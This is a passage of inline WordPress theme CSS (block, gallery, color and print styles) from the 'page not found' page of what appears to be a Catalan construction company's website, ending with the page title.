Sans","Helvetica Neue",sans-serif;font-size:.71111em;color:#767676;line-height:1.2}.entry .entry-content .wp-block-latest-posts .wp-block-latest-posts__post-full-content,.entry .entry-content .wp-block-latest-posts .wp-block-latest-posts__post-excerpt{margin-top:1rem;margin-bottom:1rem}.entry .entry-content .wp-block-latest-posts li{padding-bottom:.5rem}.entry .entry-content .wp-block-latest-posts li.menu-item-has-children,.entry .entry-content .wp-block-latest-posts li:last-child{padding-bottom:0}.entry .entry-content .wp-block-latest-posts li :not(:last-child) .wp-block-latest-posts__post-excerpt{padding-bottom:.5rem}.entry .entry-content .wp-block-latest-posts.is-grid li{border-top:2px solid #ccc;padding-top:1rem;margin-bottom:2rem}.entry .entry-content .wp-block-latest-posts.is-grid li a:after{content:''}.entry .entry-content .wp-block-latest-posts.is-grid li:last-child{margin-bottom:auto}.entry .entry-content .wp-block-latest-posts.is-grid li:last-child a:after{content:''}.entry .entry-content .wp-block-preformatted{font-size:.71111em;line-height:1.8;padding:1rem}.entry .entry-content .wp-block-verse{font-family:"NonBreakingSpaceOverride","Hoefler Text",Garamond,"Times New Roman",serif;font-size:22px;line-height:1.8}.entry .entry-content .has-drop-cap:not(:focus):first-letter {font-family:-apple-system,BlinkMacSystemFont,"Segoe UI","Roboto","Oxygen","Ubuntu","Cantarell","Fira Sans","Droid Sans","Helvetica Neue",sans-serif;font-size:3.375em;line-height:1;font-weight:700;margin:0 .25em 0 0}@-moz-document url-prefix(){.entry .entry-content .has-drop-cap:not(:focus):first-letter {margin-top:.2em}}.entry .entry-content .wp-block-pullquote{border-color:transparent;border-width:2px;padding:1rem}.entry .entry-content .wp-block-pullquote blockquote{color:#111;border:none;margin-top:calc(4*1rem);margin-bottom:calc(4.33*1rem);margin-right:0;padding-left:0}.entry .entry-content .wp-block-pullquote p{font-size:1.6875em;font-style:italic;line-height:1.3;margin-bottom:.5em;margin-top:.5em}.entry .entry-content .wp-block-pullquote p em{font-style:normal}@media only screen and (min-width:768px){.entry .entry-content .wp-block-pullquote p{font-size:2.25em}}.entry .entry-content .wp-block-pullquote cite{display:inline-block;font-family:-apple-system,BlinkMacSystemFont,"Segoe UI","Roboto","Oxygen","Ubuntu","Cantarell","Fira Sans","Droid Sans","Helvetica Neue",sans-serif;line-height:1.6;text-transform:none;color:#767676;font-size:calc(1rem/(1.25*1.125))}.entry .entry-content .wp-block-pullquote.alignleft,.entry .entry-content .wp-block-pullquote.alignright{width:100%;padding:0}.entry .entry-content .wp-block-pullquote.alignleft blockquote,.entry .entry-content .wp-block-pullquote.alignright blockquote{margin:1rem 0;padding:0;text-align:left;max-width:100%}.entry .entry-content .wp-block-pullquote.alignleft blockquote p:first-child,.entry .entry-content .wp-block-pullquote.alignright blockquote p:first-child{margin-top:0}.entry .entry-content .wp-block-pullquote.is-style-solid-color{background-color:#0073aa;padding-left:0;padding-right:0}@media only screen and (min-width:768px){.entry .entry-content .wp-block-pullquote.is-style-solid-color{padding-left:10%;padding-right:10%}}.entry .entry-content .wp-block-pullquote.is-style-solid-color p{font-size:1.6875em;line-height:1.3;margin-bottom:.5em;margin-top:.5em}@media only screen and (min-width:768px){.entry .entry-content .wp-block-pullquote.is-style-solid-color p{font-size:2.25em}}.entry .entry-content .wp-block-pullquote.is-style-solid-color a{color:#fff}.entry .entry-content .wp-block-pullquote.is-style-solid-color cite{color:inherit}.entry .entry-content .wp-block-pullquote.is-style-solid-color blockquote{max-width:100%;color:#fff;padding-left:0;margin-left:1rem;margin-right:1rem}.entry .entry-content .wp-block-pullquote.is-style-solid-color blockquote.has-text-color p,.entry .entry-content .wp-block-pullquote.is-style-solid-color blockquote.has-text-color a,.entry .entry-content .wp-block-pullquote.is-style-solid-color blockquote.has-primary-color,.entry .entry-content .wp-block-pullquote.is-style-solid-color blockquote.has-secondary-color,.entry .entry-content .wp-block-pullquote.is-style-solid-color blockquote.has-dark-gray-color,.entry .entry-content .wp-block-pullquote.is-style-solid-color blockquote.has-light-gray-color,.entry .entry-content .wp-block-pullquote.is-style-solid-color blockquote.has-white-color{color:inherit}@media only screen and (min-width:768px){.entry .entry-content .wp-block-pullquote.is-style-solid-color blockquote{margin-left:0;margin-right:0}}@media only screen and (min-width:768px){.entry .entry-content .wp-block-pullquote.is-style-solid-color.alignright,.entry .entry-content .wp-block-pullquote.is-style-solid-color.alignleft{padding:1rem calc(2*1rem)}}@media only screen and (min-width:768px){.entry .entry-content .wp-block-pullquote.is-style-solid-color.alignfull{padding-left:calc(10% + 58px + (2*1rem));padding-right:calc(10% + 58px + (2*1rem))}}.entry .entry-content .wp-block-quote:not(.is-large),.entry .entry-content .wp-block-quote:not(.is-style-large){border-width:2px;border-color:#0073aa;padding-top:0;padding-bottom:0}.entry .entry-content .wp-block-quote p{font-size:1em;font-style:normal;line-height:1.8}.entry .entry-content .wp-block-quote cite{font-size:calc(1rem/(1.25*1.125))}.entry .entry-content .wp-block-quote.is-large,.entry .entry-content .wp-block-quote.is-style-large{margin:1rem 0;padding:0;border-left:none}.entry .entry-content .wp-block-quote.is-large p,.entry .entry-content .wp-block-quote.is-style-large p{font-size:1.6875em;line-height:1.4;font-style:italic}.entry .entry-content .wp-block-quote.is-large cite,.entry .entry-content .wp-block-quote.is-large footer,.entry .entry-content .wp-block-quote.is-style-large cite,.entry .entry-content .wp-block-quote.is-style-large footer{font-size:calc(1rem/(1.25*1.125))}@media only screen and (min-width:768px){.entry .entry-content .wp-block-quote.is-large,.entry .entry-content .wp-block-quote.is-style-large{margin:1rem 0;padding:1rem 0}.entry .entry-content .wp-block-quote.is-large p,.entry .entry-content .wp-block-quote.is-style-large p{font-size:1.6875em}}.entry .entry-content .wp-block-image{max-width:100%}.entry .entry-content .wp-block-image img{display:block}@media only screen and (min-width:768px){.entry .entry-content .wp-block-image:not(.alignwide):not(.alignfull)>img{max-width:calc(8*(100vw/12) - 28px)}}@media only screen and (min-width:1168px){.entry .entry-content .wp-block-image:not(.alignwide):not(.alignfull)>img{max-width:calc(6*(100vw/12) - 28px)}}@media only screen and (min-width:768px){.entry .entry-content .wp-block-image .aligncenter{max-width:calc(8*(100vw/12) - 28px)}}@media only screen and (min-width:1168px){.entry .entry-content .wp-block-image .aligncenter{max-width:calc(6*(100vw/12) - 28px)}}@media only screen and (min-width:768px){.entry .entry-content .wp-block-image .aligncenter{margin:0;width:calc(8*(100vw/12) - 28px)}.entry .entry-content .wp-block-image .aligncenter img{margin:0 auto}}@media only screen and (min-width:1168px){.entry .entry-content .wp-block-image .aligncenter{width:calc(6*(100vw/12) - 28px)}.entry .entry-content .wp-block-image .aligncenter img{margin:0 auto}}.entry .entry-content .wp-block-image.alignfull img{width:100vw;max-width:calc(100% + (2*1rem))}@media only screen and (min-width:768px){.entry .entry-content .wp-block-image.alignfull img{max-width:calc(125% + 150px);margin-left:auto;margin-right:auto}}.entry .entry-content .wp-block-cover-image,.entry .entry-content .wp-block-cover{position:relative;min-height:430px;padding:1rem}@media only screen and (min-width:768px){.entry .entry-content .wp-block-cover-image,.entry .entry-content .wp-block-cover{padding:1rem 10%}}.entry .entry-content .wp-block-cover-image .wp-block-cover-image-text,.entry .entry-content .wp-block-cover-image .wp-block-cover-text,.entry .entry-content .wp-block-cover-image h2,.entry .entry-content .wp-block-cover .wp-block-cover-image-text,.entry .entry-content .wp-block-cover .wp-block-cover-text,.entry .entry-content .wp-block-cover h2{font-family:-apple-system,BlinkMacSystemFont,"Segoe UI","Roboto","Oxygen","Ubuntu","Cantarell","Fira Sans","Droid Sans","Helvetica Neue",sans-serif;font-size:1.6875em;font-weight:700;line-height:1.25;padding:0;color:#fff}@media only screen and (min-width:768px){.entry .entry-content .wp-block-cover-image .wp-block-cover-image-text,.entry .entry-content .wp-block-cover-image .wp-block-cover-text,.entry .entry-content .wp-block-cover-image h2,.entry .entry-content .wp-block-cover .wp-block-cover-image-text,.entry .entry-content .wp-block-cover .wp-block-cover-text,.entry .entry-content .wp-block-cover h2{font-size:2.25em;max-width:100%}}.entry .entry-content .wp-block-cover-image.alignleft,.entry .entry-content .wp-block-cover-image.alignright,.entry .entry-content .wp-block-cover.alignleft,.entry .entry-content .wp-block-cover.alignright{width:100%}@media only screen and (min-width:768px){.entry .entry-content .wp-block-cover-image.alignleft,.entry .entry-content .wp-block-cover-image.alignright,.entry .entry-content .wp-block-cover.alignleft,.entry .entry-content .wp-block-cover.alignright{padding:1rem calc(2*1rem)}}@media only screen and (min-width:768px){.entry .entry-content .wp-block-cover-image.alignfull .wp-block-cover-image-text,.entry .entry-content .wp-block-cover-image.alignfull .wp-block-cover-text,.entry .entry-content .wp-block-cover-image.alignfull h2,.entry .entry-content .wp-block-cover.alignfull .wp-block-cover-image-text,.entry .entry-content .wp-block-cover.alignfull .wp-block-cover-text,.entry .entry-content .wp-block-cover.alignfull h2{max-width:calc(8*(100vw/12) - 28px)}}@media only screen and (min-width:1168px){.entry .entry-content .wp-block-cover-image.alignfull .wp-block-cover-image-text,.entry .entry-content .wp-block-cover-image.alignfull .wp-block-cover-text,.entry .entry-content .wp-block-cover-image.alignfull h2,.entry .entry-content .wp-block-cover.alignfull .wp-block-cover-image-text,.entry .entry-content .wp-block-cover.alignfull .wp-block-cover-text,.entry .entry-content .wp-block-cover.alignfull h2{max-width:calc(6*(100vw/12) - 28px)}}@media only screen and (min-width:768px){.entry .entry-content .wp-block-cover-image.alignfull,.entry .entry-content .wp-block-cover.alignfull{padding-left:calc(10% + 58px + (2*1rem));padding-right:calc(10% + 58px + (2*1rem))}.entry .entry-content .wp-block-cover-image.alignfull .wp-block-cover-image-text,.entry .entry-content .wp-block-cover-image.alignfull .wp-block-cover-text,.entry .entry-content .wp-block-cover-image.alignfull h2,.entry .entry-content .wp-block-cover.alignfull .wp-block-cover-image-text,.entry .entry-content .wp-block-cover.alignfull .wp-block-cover-text,.entry .entry-content .wp-block-cover.alignfull h2{padding:0}}.entry .entry-content .wp-block-gallery{list-style-type:none;padding-left:0}.entry .entry-content .wp-block-gallery .blocks-gallery-image:last-child,.entry .entry-content .wp-block-gallery .blocks-gallery-item:last-child{margin-bottom:16px}.entry .entry-content .wp-block-gallery figcaption a{color:#fff}.entry .entry-content .wp-block-audio figcaption,.entry .entry-content .wp-block-video figcaption,.entry .entry-content .wp-block-image figcaption,.entry .entry-content .wp-block-gallery .blocks-gallery-image figcaption,.entry .entry-content .wp-block-gallery .blocks-gallery-item figcaption{font-size:.71111em;font-family:-apple-system,BlinkMacSystemFont,"Segoe UI","Roboto","Oxygen","Ubuntu","Cantarell","Fira Sans","Droid Sans","Helvetica Neue",sans-serif;line-height:1.6;margin:0;padding:.5rem;text-align:center}.entry .entry-content .wp-block-separator,.entry .entry-content hr{background-color:#767676;border:0;height:2px;margin-bottom:2rem;margin-top:2rem;max-width:2.25em;text-align:left}.entry .entry-content .wp-block-separator:not(.wp-block-separator),.entry .entry-content hr:not(.wp-block-separator){max-width:100%}@media only screen and (min-width:768px){.entry .entry-content .wp-block-separator:not(.wp-block-separator),.entry .entry-content hr:not(.wp-block-separator){max-width:calc(8*(100vw/12) - 28px)}}@media only screen and (min-width:1168px){.entry .entry-content .wp-block-separator:not(.wp-block-separator),.entry .entry-content hr:not(.wp-block-separator){max-width:calc(6*(100vw/12) - 28px)}}.entry .entry-content .wp-block-separator.is-style-wide,.entry .entry-content hr.is-style-wide{max-width:100%}@media only screen and (min-width:768px){.entry .entry-content .wp-block-separator.is-style-wide,.entry .entry-content hr.is-style-wide{max-width:calc(8*(100vw/12) - 28px)}}@media only screen and (min-width:1168px){.entry .entry-content .wp-block-separator.is-style-wide,.entry .entry-content hr.is-style-wide{max-width:calc(6*(100vw/12) - 28px)}}.entry .entry-content .wp-block-separator.is-style-dots,.entry .entry-content hr.is-style-dots{max-width:100%;background-color:inherit;border:inherit;height:inherit;text-align:center}@media only screen and (min-width:768px){.entry .entry-content .wp-block-separator.is-style-dots,.entry .entry-content hr.is-style-dots{max-width:calc(8*(100vw/12) - 28px)}}@media only screen and (min-width:1168px){.entry .entry-content .wp-block-separator.is-style-dots,.entry .entry-content hr.is-style-dots{max-width:calc(6*(100vw/12) - 28px)}}.entry .entry-content .wp-block-separator.is-style-dots:not(.has-text-color):not(.has-background),.entry .entry-content hr.is-style-dots:not(.has-text-color):not(.has-background){color:#767676}.entry .entry-content .wp-block-separator.is-style-dots:before,.entry .entry-content hr.is-style-dots:before{font-size:1.6875em;letter-spacing:.88889em;padding-left:.88889em}.entry .entry-content .wp-block-separator+h1:before,.entry .entry-content .wp-block-separator+h2:before,.entry .entry-content hr+h1:before,.entry .entry-content hr+h2:before{display:none}.entry .entry-content .wp-block-embed-twitter{word-break:break-word}.entry .entry-content .wp-block-table th,.entry .entry-content .wp-block-table td{border-color:#767676}.entry .entry-content .wp-block-file{font-family:-apple-system,BlinkMacSystemFont,"Segoe UI","Roboto","Oxygen","Ubuntu","Cantarell","Fira Sans","Droid Sans","Helvetica Neue",sans-serif}.entry .entry-content .wp-block-file .wp-block-file__button{display:table;transition:background .15s ease-in-out;border:none;border-radius:5px;background:#0073aa;font-size:22px;font-family:-apple-system,BlinkMacSystemFont,"Segoe UI","Roboto","Oxygen","Ubuntu","Cantarell","Fira Sans","Droid Sans","Helvetica Neue",sans-serif;line-height:1.2;text-decoration:none;font-weight:700;padding:.75rem 1rem;color:#fff;margin-left:0;margin-top:calc(.75*1rem)}@media only screen and (min-width:1168px){.entry .entry-content .wp-block-file .wp-block-file__button{font-size:22px;padding:.875rem 1.5rem}}.entry .entry-content .wp-block-file .wp-block-file__button:hover{background:#111;cursor:pointer}.entry .entry-content .wp-block-file .wp-block-file__button:focus{background:#111;outline:thin dotted;outline-offset:-4px}.entry .entry-content .wp-block-code{border-radius:0}.entry .entry-content .wp-block-code code{font-size:1.125em;white-space:pre-wrap;word-break:break-word}.entry .entry-content .wp-block-columns .wp-block-column>*:first-child{margin-top:0}.entry .entry-content .wp-block-columns .wp-block-column>*:last-child{margin-bottom:0}@media only screen and (min-width:768px){.entry .entry-content .wp-block-columns .wp-block-image>img:not(.alignwide):not(.alignfull),.entry .entry-content .wp-block-columns .wp-block-image>figure{max-width:100%}}@media only screen and (min-width:1168px){.entry .entry-content .wp-block-columns .wp-block-image>img:not(.alignwide):not(.alignfull),.entry .entry-content .wp-block-columns .wp-block-image>figure{max-width:100%}}@media only screen and (min-width:768px){.entry .entry-content .wp-block-columns{flex-wrap:nowrap}.entry .entry-content .wp-block-columns .wp-block-column:not(:first-child){margin-left:32px}}@media only screen and (min-width:768px){.entry .entry-content .wp-block-group:not(.alignfull)>.wp-block-group__inner-container>.alignfull,.entry .entry-content .wp-block-group:not(.alignfull)>.wp-block-group__inner-container>.wp-block-image>img{left:0;max-width:100%}}.entry .entry-content .wp-block-group.alignfull>.wp-block-group__inner-container{max-width:calc(100% - (2*1rem));margin:0 1rem}@media only screen and (min-width:768px){.entry .entry-content .wp-block-group.alignfull>.wp-block-group__inner-container{max-width:80%;margin:0 10%;padding:0 60px}}.entry .entry-content .wp-block-group.has-background{padding:1rem;margin-top:0;margin-bottom:0}.entry .entry-content .wp-block-group.has-background .wp-block-group__inner-container>*:first-child{margin-top:0}.entry .entry-content .wp-block-group.has-background .wp-block-group__inner-container>*:last-child{margin-bottom:0}.entry .entry-content .wp-block-group.has-background.alignfull{padding-left:0;padding-right:0}@media only screen and (min-width:768px){.entry .entry-content .wp-block-group.has-background.alignfull{padding-top:1rem;padding-bottom:1rem}}.entry .entry-content .wp-block-group.has-background:not(.alignfull)>.wp-block-group__inner-container>.alignfull{width:100%;max-width:100%}@media only screen and (min-width:768px){.entry .entry-content .wp-block-group.has-background:not(.alignfull)>.wp-block-group__inner-container>.alignfull{width:calc(100% + 2rem);max-width:calc(100% + 2rem);margin-left:-1rem}}.entry .entry-content .wp-block-latest-comments .wp-block-latest-comments__comment-meta{font-family:-apple-system,BlinkMacSystemFont,"Segoe UI","Roboto","Oxygen","Ubuntu","Cantarell","Fira Sans","Droid Sans","Helvetica Neue",sans-serif;font-weight:700}.entry .entry-content .wp-block-latest-comments .wp-block-latest-comments__comment-meta .wp-block-latest-comments__comment-date{font-weight:400}.entry .entry-content .wp-block-latest-comments .wp-block-latest-comments__comment,.entry .entry-content .wp-block-latest-comments .wp-block-latest-comments__comment-date,.entry .entry-content .wp-block-latest-comments .wp-block-latest-comments__comment-excerpt p{font-size:inherit}.entry .entry-content .wp-block-latest-comments.has-dates .wp-block-latest-comments__comment-date{font-size:.71111em}.entry .entry-content .has-small-font-size{font-size:.88889em}.entry .entry-content .has-normal-font-size{font-size:1.125em}.entry .entry-content .has-large-font-size{font-size:1.6875em}.entry .entry-content .has-huge-font-size{font-size:2.25em}.entry .entry-content .has-primary-background-color,.entry .entry-content .has-secondary-background-color,.entry .entry-content .has-dark-gray-background-color,.entry .entry-content .has-light-gray-background-color{color:#fff}.entry .entry-content .has-primary-background-color>p,.entry .entry-content .has-primary-background-color>h1,.entry .entry-content .has-primary-background-color>h2,.entry .entry-content .has-primary-background-color>h3,.entry .entry-content .has-primary-background-color>h4,.entry .entry-content .has-primary-background-color>h5,.entry .entry-content .has-primary-background-color>h6,.entry .entry-content .has-primary-background-color>a,.entry .entry-content .has-secondary-background-color>p,.entry .entry-content .has-secondary-background-color>h1,.entry .entry-content .has-secondary-background-color>h2,.entry .entry-content .has-secondary-background-color>h3,.entry .entry-content .has-secondary-background-color>h4,.entry .entry-content .has-secondary-background-color>h5,.entry .entry-content .has-secondary-background-color>h6,.entry .entry-content .has-secondary-background-color>a,.entry .entry-content .has-dark-gray-background-color>p,.entry .entry-content .has-dark-gray-background-color>h1,.entry .entry-content .has-dark-gray-background-color>h2,.entry .entry-content .has-dark-gray-background-color>h3,.entry .entry-content .has-dark-gray-background-color>h4,.entry .entry-content .has-dark-gray-background-color>h5,.entry .entry-content .has-dark-gray-background-color>h6,.entry .entry-content .has-dark-gray-background-color>a,.entry .entry-content .has-light-gray-background-color>p,.entry .entry-content .has-light-gray-background-color>h1,.entry .entry-content .has-light-gray-background-color>h2,.entry .entry-content .has-light-gray-background-color>h3,.entry .entry-content .has-light-gray-background-color>h4,.entry .entry-content .has-light-gray-background-color>h5,.entry .entry-content .has-light-gray-background-color>h6,.entry .entry-content .has-light-gray-background-color>a{color:#fff}.entry .entry-content .has-white-background-color{color:#111}.entry .entry-content .has-white-background-color>p,.entry .entry-content .has-white-background-color>h1,.entry .entry-content .has-white-background-color>h2,.entry .entry-content .has-white-background-color>h3,.entry .entry-content .has-white-background-color>h4,.entry .entry-content .has-white-background-color>h5,.entry .entry-content .has-white-background-color>h6,.entry .entry-content .has-white-background-color>a{color:#111}.entry .entry-content .has-primary-background-color,.entry .entry-content .wp-block-pullquote.is-style-solid-color.has-primary-background-color{background-color:#0073aa}.entry .entry-content .has-secondary-background-color,.entry .entry-content .wp-block-pullquote.is-style-solid-color.has-secondary-background-color{background-color:#005177}.entry .entry-content .has-dark-gray-background-color,.entry .entry-content .wp-block-pullquote.is-style-solid-color.has-dark-gray-background-color{background-color:#111}.entry .entry-content .has-light-gray-background-color,.entry .entry-content .wp-block-pullquote.is-style-solid-color.has-light-gray-background-color{background-color:#767676}.entry .entry-content .has-white-background-color,.entry .entry-content .wp-block-pullquote.is-style-solid-color.has-white-background-color{background-color:#fff}.entry .entry-content .has-primary-color,.entry .entry-content .wp-block-pullquote blockquote.has-primary-color,.entry .entry-content .wp-block-pullquote.is-style-solid-color blockquote.has-primary-color,.entry .entry-content .wp-block-pullquote.is-style-solid-color blockquote.has-primary-color>p{color:#0073aa}.entry .entry-content .has-secondary-color,.entry .entry-content .wp-block-pullquote blockquote.has-secondary-color,.entry .entry-content .wp-block-pullquote.is-style-solid-color blockquote.has-secondary-color,.entry .entry-content .wp-block-pullquote.is-style-solid-color blockquote.has-secondary-color>p{color:#005177}.entry .entry-content .has-dark-gray-color,.entry .entry-content .wp-block-pullquote.is-style-solid-color blockquote.has-dark-gray-color,.entry .entry-content .wp-block-pullquote.is-style-solid-color blockquote.has-dark-gray-color>p{color:#111}.entry .entry-content .has-light-gray-color,.entry .entry-content .wp-block-pullquote blockquote.has-light-gray-color,.entry .entry-content .wp-block-pullquote.is-style-solid-color blockquote.has-light-gray-color,.entry .entry-content .wp-block-pullquote.is-style-solid-color blockquote.has-light-gray-color>p{color:#767676}.entry .entry-content .has-white-color,.entry .entry-content .wp-block-pullquote blockquote.has-white-color,.entry .entry-content .wp-block-pullquote.is-style-solid-color blockquote.has-white-color{color:#fff}.page-content .wp-smiley,.entry-content .wp-smiley,.comment-content .wp-smiley{border:none;margin-bottom:0;margin-top:0;padding:0}embed,iframe,object{max-width:100%}.custom-logo-link{display:inline-block}.avatar{border-radius:100%;display:block;height:calc(2.25*1rem);min-height:inherit;width:calc(2.25*1rem)}svg{transition:fill .12s ease-in-out;fill:currentColor}.wp-caption{margin-bottom:calc(1.5*1rem)}@media only screen and (min-width:768px){.wp-caption.aligncenter{position:relative;left:calc(calc(8*(100vw/12) - 28px)/2);transform:translateX(-50%)}}@media only screen and (min-width:1168px){.wp-caption.aligncenter{left:calc(calc(6*(100vw/12) - 28px)/2)}}.wp-caption img[class*=wp-image-]{display:block;margin-left:auto;margin-right:auto}.wp-caption-text{color:#767676;font-size:.71111em;font-family:-apple-system,BlinkMacSystemFont,"Segoe UI","Roboto","Oxygen","Ubuntu","Cantarell","Fira Sans","Droid Sans","Helvetica Neue",sans-serif;line-height:1.6;margin:0;padding:.5rem;text-align:center}.gallery{display:flex;flex-flow:row wrap;justify-content:center;margin-bottom:calc(1.5*1rem)}.gallery-item{display:inline-block;margin-right:16px;margin-bottom:16px;text-align:center;vertical-align:top;width:100%}.gallery-columns-2 .gallery-item{max-width:calc((100% - 16px*1)/2)}.gallery-columns-2 .gallery-item:nth-of-type(2n+2){margin-right:0}.gallery-columns-3 .gallery-item{max-width:calc((100% - 16px*2)/3)}.gallery-columns-3 .gallery-item:nth-of-type(3n+3){margin-right:0}.gallery-columns-4 .gallery-item{max-width:calc((100% - 16px*3)/4)}.gallery-columns-4 .gallery-item:nth-of-type(4n+4){margin-right:0}.gallery-columns-5 .gallery-item{max-width:calc((100% - 16px*4)/5)}.gallery-columns-5 .gallery-item:nth-of-type(5n+5){margin-right:0}.gallery-columns-6 .gallery-item{max-width:calc((100% - 16px*5)/6)}.gallery-columns-6 .gallery-item:nth-of-type(6n+6){margin-right:0}.gallery-columns-7 .gallery-item{max-width:calc((100% - 16px*6)/7)}.gallery-columns-7 .gallery-item:nth-of-type(7n+7){margin-right:0}.gallery-columns-8 .gallery-item{max-width:calc((100% - 16px*7)/8)}.gallery-columns-8 .gallery-item:nth-of-type(8n+8){margin-right:0}.gallery-columns-9 .gallery-item{max-width:calc((100% - 16px*8)/9)}.gallery-columns-9 .gallery-item:nth-of-type(9n+9){margin-right:0}.gallery-item:last-of-type{padding-right:0}.gallery-caption{display:block;font-size:.71111em;font-family:-apple-system,BlinkMacSystemFont,"Segoe UI","Roboto","Oxygen","Ubuntu","Cantarell","Fira Sans","Droid Sans","Helvetica Neue",sans-serif;line-height:1.6;margin:0;padding:.5rem}.gallery-item>div>a{display:block;line-height:0;box-shadow:0 0 0 0 transparent}.gallery-item>div>a:focus{box-shadow:0 0 0 2px #0073aa} .image-filters-enabled .site-header.featured-image .site-featured-image:before,.image-filters-enabled .site-header.featured-image .site-featured-image:after,.image-filters-enabled .entry .post-thumbnail:before,.image-filters-enabled .entry .post-thumbnail:after,.main-navigation .sub-menu,.sticky-post,.entry .entry-content .wp-block-button .wp-block-button__link:not(.has-background),.entry .button,button,input[type=button],input[type=reset],input[type=submit],.entry .entry-content>.has-primary-background-color,.entry .entry-content>*[class^=wp-block-].has-primary-background-color,.entry .entry-content>*[class^=wp-block-] .has-primary-background-color,.entry .entry-content>*[class^=wp-block-].is-style-solid-color,.entry .entry-content>*[class^=wp-block-].is-style-solid-color.has-primary-background-color,.entry .entry-content .wp-block-file .wp-block-file__button{background-color:#a80000}a,a:visited,.main-navigation .main-menu>li,.main-navigation ul.main-menu>li>a,.post-navigation .post-title,.entry .entry-meta a:hover,.entry .entry-footer a:hover,.entry .entry-content .more-link:hover,.main-navigation .main-menu>li>a+svg,.comment .comment-metadata>a:hover,.comment .comment-metadata .comment-edit-link:hover,#colophon .site-info a:hover,.widget a,.entry .entry-content .wp-block-button.is-style-outline .wp-block-button__link:not(.has-text-color),.entry .entry-content>.has-primary-color,.entry .entry-content>*[class^=wp-block-] .has-primary-color,.entry .entry-content>*[class^=wp-block-].is-style-solid-color blockquote.has-primary-color,.entry .entry-content>*[class^=wp-block-].is-style-solid-color blockquote.has-primary-color p{color:#a80000}blockquote,.entry .entry-content blockquote,.entry .entry-content .wp-block-quote:not(.is-large),.entry .entry-content .wp-block-quote:not(.is-style-large),input[type=text]:focus,input[type=email]:focus,input[type=url]:focus,input[type=password]:focus,input[type=search]:focus,input[type=number]:focus,input[type=tel]:focus,input[type=range]:focus,input[type=date]:focus,input[type=month]:focus,input[type=week]:focus,input[type=time]:focus,input[type=datetime]:focus,input[type=datetime-local]:focus,input[type=color]:focus,textarea:focus{border-color:#a80000}.gallery-item>div>a:focus{box-shadow:0 0 0 2px #a80000}a:hover,a:active,.main-navigation .main-menu>li>a:hover,.main-navigation .main-menu>li>a:hover+svg,.post-navigation .nav-links a:hover,.post-navigation .nav-links a:hover .post-title,.author-bio .author-description .author-link:hover,.entry .entry-content>.has-secondary-color,.entry .entry-content>*[class^=wp-block-] .has-secondary-color,.entry .entry-content>*[class^=wp-block-].is-style-solid-color blockquote.has-secondary-color,.entry .entry-content>*[class^=wp-block-].is-style-solid-color blockquote.has-secondary-color p,.comment .comment-author .fn a:hover,.comment-reply-link:hover,.comment-navigation .nav-previous a:hover,.comment-navigation .nav-next a:hover,#cancel-comment-reply-link:hover,.widget a:hover{color:#750000}.main-navigation .sub-menu>li>a:hover,.main-navigation .sub-menu>li>a:focus,.main-navigation .sub-menu>li>a:hover:after,.main-navigation .sub-menu>li>a:focus:after,.main-navigation .sub-menu>li>.menu-item-link-return:hover,.main-navigation .sub-menu>li>.menu-item-link-return:focus,.main-navigation .sub-menu>li>a:not(.submenu-expand):hover,.main-navigation .sub-menu>li>a:not(.submenu-expand):focus,.entry .entry-content>.has-secondary-background-color,.entry .entry-content>*[class^=wp-block-].has-secondary-background-color,.entry .entry-content>*[class^=wp-block-] .has-secondary-background-color,.entry .entry-content>*[class^=wp-block-].is-style-solid-color.has-secondary-background-color{background-color:#750000}::selection{background-color:#f2d9d9}::-moz-selection{background-color:#f2d9d9} .nb-loc [data-sek-level],.nb-loc [data-sek-level] p,.nb-loc [data-sek-level] .sek-btn,.nb-loc [data-sek-level] button,.nb-loc [data-sek-level] input,.nb-loc [data-sek-level] select,.nb-loc [data-sek-level] optgroup,.nb-loc [data-sek-level] textarea,.nb-loc [data-sek-level] ul,.nb-loc [data-sek-level] ol,.nb-loc [data-sek-level] li{font-family:'Roboto'}.nb-loc [data-sek-level] h1,.nb-loc [data-sek-level] h2,.nb-loc [data-sek-level] h3,.nb-loc [data-sek-level] h4,.nb-loc [data-sek-level] h5,.nb-loc [data-sek-level] h6{font-family:'Roboto'}</style><style media="print">@media print{@page{margin:2cm}.entry{margin-top:1em}.entry .entry-header,.site-footer .site-info{margin:0}body{font:13pt Georgia,"Times New Roman",Times,serif;line-height:1.3;background:#fff !important;color:#000}h1{font-size:24pt}h2,h3,h4,.has-regular-font-size,.has-large-font-size,h2.author-title,p.author-bio,.comments-title,h3{font-size:14pt;margin-top:25px}a{page-break-inside:avoid}blockquote{page-break-inside:avoid}h1,h2,h3,h4,h5,h6{page-break-after:avoid;page-break-inside:avoid}img{page-break-inside:avoid;page-break-after:avoid}table,pre{page-break-inside:avoid}ul,ol,dl{page-break-before:avoid}a:link,a:visited,a{background:0 0;font-weight:700;text-decoration:underline;text-align:left}a{page-break-inside:avoid}a[href^=http]:after{content:" < " attr(href) "> "}a:after>img{content:""}article a[href^="#"]:after{content:""}a:not(:local-link):after{content:" < " attr(href) "> "}.main-navigation,.site-title+.main-navigation,.social-navigation,.site-branding-container:before,.entry .entry-title:before,.entry-footer,.author-description:before,.post-navigation,.widget-area,.comment-form-flex,.comment-reply,.comment .comment-metadata .edit-link{display:none}.entry .entry-content .wp-block-button .wp-block-button__link,.entry .entry-content .button{color:#000;background:0 0}.site-header.featured-image{min-height:0}.site-header.featured-image .main-navigation a,.site-header.featured-image .main-navigation a+svg,.site-header.featured-image .social-navigation a,.site-header.featured-image .site-title a,.site-header.featured-image .site-featured-image a,.site-header.featured-image .site-branding .site-title,.site-header.featured-image .site-branding .site-description,.site-header.featured-image .main-navigation a:after,.site-header.featured-image .main-navigation .main-menu>li.menu-item-has-children:after,.site-header.featured-image .main-navigation li,.site-header.featured-image .social-navigation li,.site-header.featured-image .entry-meta,.site-header.featured-image .entry-title,.site-header.featured-image#masthead .site-title a{color:#000;text-shadow:none}.site-header.featured-image .site-featured-image .entry-header,.site-header.featured-image .site-branding-container{margin-top:0;margin-bottom:0}.site-header.featured-image .site-featured-image .post-thumbnail img{position:relative;height:initial;width:initial;object-fit:none;min-width:0;min-height:0;max-width:100%;margin-top:1rem}.image-filters-enabled *:after{display:none !important}.image-filters-enabled .site-header.featured-image .site-featured-image:before{display:none}.image-filters-enabled .site-header.featured-image .site-featured-image .post-thumbnail img{filter:none}}</style><title>No s’ha trobat la pàgina – Ermon Constructora